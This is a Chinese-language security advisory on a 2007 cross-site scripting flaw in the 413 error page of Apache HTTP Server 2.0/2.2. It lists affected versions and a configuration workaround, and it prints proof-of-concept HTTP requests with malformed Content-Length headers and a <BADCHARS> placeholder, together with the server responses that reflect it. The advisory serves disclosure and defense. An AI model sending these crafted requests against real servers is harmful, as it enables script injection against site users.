Apache HTTP Server畸形HTTP方式413错误页面跨站脚本漏洞

涉及程序：
apache HTTP Server
  
描述：
Apache HTTP Server畸形HTTP方式413错误页面跨站脚本漏洞
  
详细：
Apache HTTP Server是一款流行的Web服务器。

Apache HTTP Server处理畸形用户请求时存在漏洞，远程攻击者可能利用此漏洞获取脚本源码。

如果远程用户提交的畸形HTTP请求承载有以下形式之一负载（如JavaScript）和无效长度数据的话，就会导致Apache HTTP服务器返回客户端所提供的脚本代码：

两个Content-length头等于0，如Content-Length: 0[LF]Content-Length: 0
一个Content-length头等于两个值，如Content-length: 0, 0
一个Content-length:头等于负数，如Content-length: -1
一个Content-length头等于很大的值，如Content-length: 9999999999999999999999999999999999999999999999。

提交了无效长度数据后Apache就会返回413 Request Entity Too Large错误，导致在用户浏览器会话中执行任意HTML和脚本代码。

<*来源：Amit Klein （Amit.Klein@SanctumInc.com）
     Joe Orton

链接：http://procheckup.com/Vulnerability_PR07-37.php
     http://secunia.com/advisories/27906/
*>

受影响系统：
Apache Group Apache 2.2.4
Apache Group Apache 2.2.3
Apache Group Apache 2.0.59
Apache Group Apache 2.0.55
Apache Group Apache 2.0.51
Apache Group Apache 2.0.46

  
攻击方法：
警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

请求：

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]

服务器响应：

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at <badchars> Port 80</address>
</body></html>

请求：

GET /<BADCHARS>/ HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

服务器响应：

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:41:17 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<BADCHARS>/<br />
does not allow request data with GET requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address>
</body></html>

请求：

<BADCHARS> / HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

服务器响应：

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:42:46 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with <BADCHARS> requests, or the amount of data provided in
the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address>
</body></html>

  
解决方案：
临时解决方法：

* 向Apache配置文件添加ErrorDocument 413语句禁用默认的413错误页面。

厂商补丁：

Apache Group
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.apache.org

  
附加信息：
无